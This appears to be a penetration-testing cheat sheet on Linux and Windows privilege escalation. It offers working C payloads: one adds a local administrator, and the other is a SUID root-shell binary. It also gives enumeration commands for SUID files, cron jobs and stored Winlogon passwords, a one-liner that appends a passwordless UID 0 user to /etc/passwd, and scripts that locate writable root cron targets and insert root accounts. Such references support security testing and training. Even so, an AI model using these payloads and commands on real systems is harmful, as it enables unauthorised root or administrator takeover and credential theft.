
Privilege Escalation

Privilege escalation means gaining higher levels of access or permissions within a system or network beyond what was initially granted. It involves exploiting vulnerabilities or misconfigurations to elevate privileges from a lower-privileged user or account to gain control over more sensitive resources or execute commands with increased authority.

Linux Privilege Escalation

  • sudo -l
  • Kernel Exploits
  • OS Exploits
  • Password reuse (mysql, .bash_history, 000-default.conf...)
  • Known binaries with the SUID flag that offer an interactive mode or shell escape (e.g. nmap)
  • Custom binaries with the SUID flag that call other binaries or execute commands
  • Writable files owned by root that get executed (cronjobs)
  • MySQL as root
  • Vulnerable services (chkrootkit, logrotate)
  • Writable /etc/passwd
  • Readable .bash_history
  • SSH private key
  • Listening ports on localhost
  • /etc/fstab
  • /etc/exports
  • /var/mail
  • Process as other user (root) executing something you have permissions to modify
  • SSH public key + Predictable PRNG
  • apt update hooking (Pre-Invoke)
  • Capabilities

Windows Privilege Escalation

  • Kernel Exploits
  • OS Exploits
  • Pass The Hash
  • Password reuse
  • DLL hijacking (Path)
  • Vulnerable services
  • Writable service binary paths
  • Unquoted service paths
  • Listening ports on localhost
  • Registry keys (AlwaysInstallElevated, stored autologon credentials)

Kernel Exploits



Windows Add User

#include <stdlib.h>   /* system, NULL, EXIT_FAILURE */

/* Fill in USERNAME and PASSWORD before compiling (the page export dropped the
   original placeholders). "net user /add" needs administrative rights, so this
   is a payload for an elevated execution vector (writable service binary, DLL
   hijack, ...), not an escalation by itself. */
#define USERNAME "user"
#define PASSWORD "password"

int main(void)
{
    /* system() returns -1 if no shell could be started, otherwise the exit
       status of the command line */
    int rc = system("net user " USERNAME " " PASSWORD " /add && "
                    "net localgroup administrators " USERNAME " /add");
    return (rc == -1) ? EXIT_FAILURE : rc;
}

SUID Change

SUID: set owner user ID. A file with the SUID bit runs with the privileges of its owner, so a root-owned SUID copy of this program hands out a root shell:

#define _GNU_SOURCE   /* setresuid() is a GNU extension in glibc */
#include <stdlib.h>   /* system */
#include <unistd.h>   /* setresuid */

int main(void)
{
    /* Set real, effective and saved UID to 0. All three matter: bash resets
       an effective UID that differs from the real UID unless run with -p,
       so a plain seteuid(0) would be undone by the shell. */
    if (setresuid(0, 0, 0) != 0)
        return 1;
    system("/bin/bash");
    return 0;
}

Compile it, then have root (or a root process you control, e.g. a writable cron job) chown it to root and chmod it to 4755.

Privilege Escalation:

# Find binaries that will execute as the owner (SUID)
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 2>/dev/null
find / -user root -perm -4000 -exec ls -ld {} \; 2>/dev/null

# Find binaries that will execute as the group (SGID)
find / -perm -g=s -type f 2>/dev/null

# Find sticky-bit directories (files in them can only be deleted by their owner, e.g. /tmp)
find / -perm -1000 -type d 2>/dev/null

# Files writable by the current user (-writable tests your own access, not "everyone")
find / -writable -type f 2>/dev/null

# World-writable directories (/home/homedir is a placeholder for your own home, which is pruned;
# drop "| grep -v root" to keep root-owned entries, which are the interesting ones)
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root

# World-writable files
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null

# Writable config files
find /etc/ -writable -type f 2>/dev/null
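The searches above as reusable functions, plus the filter a practitioner actually wants: separating the SUID binaries every stock install ships from the custom ones worth reversing first. This is an added example, not code from the original page; BASELINE_SUID is an assumption for illustration and should be rebuilt from a clean reference host of the same distribution and release.

```shell
#!/bin/sh
# Added example, not from the original page: SUID/SGID/world-writable
# searches as functions, and a baseline filter for unexpected SUID files.
# BASELINE_SUID is an assumption for illustration; build your own from a
# clean reference host of the same distribution and release.

BASELINE_SUID="passwd su sudo mount umount chsh chfn newgrp gpasswd ping fusermount pkexec"

# find_suid ROOT: regular files with the SUID bit under ROOT, one filesystem.
find_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# find_sgid ROOT: regular files with the SGID bit under ROOT.
find_sgid() {
    find "$1" -xdev -type f -perm -2000 2>/dev/null | sort
}

# find_world_writable ROOT: regular files anyone can modify (-perm -0002 is
# "others may write"; -writable would only test the current user). /proc is
# pruned because its pseudo-files report misleading modes.
find_world_writable() {
    find "$1" -xdev -path /proc -prune -o -type f -perm -0002 -print 2>/dev/null | sort
}

# in_baseline NAME: succeed if NAME is one of the expected SUID binaries.
in_baseline() {
    for b in $BASELINE_SUID; do
        [ "$b" = "$1" ] && return 0
    done
    return 1
}

# unexpected_suid ROOT: SUID files whose name is not in the baseline. These
# are the custom binaries that call other programs or run commands, the
# "Custom binaries with suid flag" item in the list above.
unexpected_suid() {
    find_suid "$1" | while IFS= read -r f; do
        in_baseline "$(basename "$f")" || printf '%s\n' "$f"
    done
    return 0
}

# report ROOT: print all four lists with headers.
report() {
    echo "== SUID binaries not in baseline (review these first)"; unexpected_suid "$1"
    echo "== All SUID binaries";    find_suid "$1"
    echo "== SGID binaries";        find_sgid "$1"
    echo "== World-writable files"; find_world_writable "$1"
}

# Stand-alone usage: sh suid_audit.sh /
if [ -n "${1-}" ]; then
    report "$1"
fi
```

Run it against `/` on the target; anything under "not in baseline" is either a distribution package you forgot to list (check with the package manager) or a custom binary, and the custom ones are where shell escapes, relative command names and writable helper scripts live.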

Windows Exploit Suggester

Feed it the output of systeminfo from the target (systeminfo > systeminfo.txt) together with the bulletin database (the mssb.xls file, which the tool's --update option downloads):
python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
python2 windows-exploit-suggester.py --systeminfo systeminfo.txt --database 2018-11-25-mssb.xls

Windows Priv Escalation

AlwaysInstallElevated
Check whether the following registry values are set to 1. Both the HKCU and the HKLM value must be 1 for Windows Installer to run .msi packages as SYSTEM:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Autologon credentials stored in the Winlogon key (DefaultPassword is plaintext):
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

Basic Linux Enumeration

Distribution type & kernel version
cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux

Default writeable directories
/tmp
/dev/shm

Search for passwords (here: within config.php)
grep -R 'password' config.php

Find possible other writeable directories
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;

Service(s) running as root user
ps aux | grep root
ps -ef | grep root

Installed applications
ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archives/
ls -lah /var/cache/yum/

Scheduled jobs
crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab

Find pattern in file:
grep -rnw '/etc/passwd' -e 'root'

Sticky bit, SGID, SUID
Sticky bit
find / -perm -1000 -type d 2>/dev/null
SGID (chmod 2000)
find / -perm -g=s -type f 2>/dev/null
SUID (chmod 4000)
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null
SUID or SGID (the parentheses matter: without them -type f only applies to the SUID half of the -o)
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null

Add user to /etc/passwd and root group (requires a writable /etc/passwd; the empty second field means "no password", which some PAM setups reject, so put a password hash there if su to the new user fails)
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
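The "Scheduled jobs" and "/etc/passwd" steps above, worked through as a script: it parses a system crontab for the paths root's jobs execute, reports the ones the current user can already modify or can create in a writable directory, and builds the UID 0 passwd line with a writability check in front of it. This is an added example, not code from the original page; the sample crontab is constructed for the demonstration and the parsing is a heuristic over whitespace-separated tokens.

```shell
#!/bin/sh
# Added example, not from the original page: audit a system crontab for the
# "writable files owned by root that get executed" case, and build the
# /etc/passwd root entry from the enumeration section. The sample crontab
# below is constructed for the demonstration.

# cron_paths CRONTAB: absolute-path tokens from every job's command field.
# System crontab lines are "m h dom mon dow user command"; "@reboot user
# command" entries start the command at field 3. Comments, blank lines and
# VAR=value lines are skipped. Tokens glued to shell syntax ("/x/y;") are
# printed as-is; treat the output as a lead list, not a parse.
cron_paths() {
    awk '
        /^[[:space:]]*#/            { next }
        /^[[:space:]]*$/            { next }
        /^[A-Za-z_][A-Za-z0-9_]*=/  { next }
        {
            start = ($1 ~ /^@/) ? 3 : 7
            for (i = start; i <= NF; i++)
                if ($i ~ /^\/./) print $i
        }
    ' "$1" | sort -u
}

# writable_targets CRONTAB: "writable <path>" for targets the current user
# can modify, "missing-in-writable-dir <path>" for targets that do not
# exist but whose directory is writable (create the script and wait for
# cron). Targets that exist and are read-only are silently skipped.
writable_targets() {
    cron_paths "$1" | while IFS= read -r p; do
        if [ -e "$p" ]; then
            [ -w "$p" ] && printf 'writable %s\n' "$p"
        elif [ -w "$(dirname "$p")" ]; then
            printf 'missing-in-writable-dir %s\n' "$p"
        fi
    done
    return 0
}

# write_sample_crontab FILE PREFIX: constructed sample; PREFIX is prepended
# to the job paths so the example can run against a scratch directory.
write_sample_crontab() {
    cat > "$1" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 *  * * * root run-parts --report $2/etc/cron.hourly
*/5 * * * * root $2/opt/scripts/backup.sh $2/var/www
@reboot     root $2/usr/local/bin/cleanup.sh
EOF
}

# passwd_entry USER HASH: a UID 0 /etc/passwd line. An empty HASH means
# "no password", which some PAM configurations refuse; a hash produced with
# "openssl passwd -6 'pass'" works everywhere.
passwd_entry() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# add_root_user PASSWD_FILE USER HASH: append the line, but only if the
# file is actually writable (the precondition for this whole technique).
add_root_user() {
    [ -w "$1" ] || { echo "$1 is not writable" >&2; return 1; }
    passwd_entry "$2" "$3" >> "$1"
}

# Stand-alone usage: audit the real system crontab when it is readable.
if [ -r /etc/crontab ]; then
    writable_targets /etc/crontab
fi
```

Extend the same check to /etc/cron.d/* and the /etc/cron.{hourly,daily,weekly,monthly} directories; a writable directory in that set is as good as a writable script, because run-parts executes whatever is dropped there.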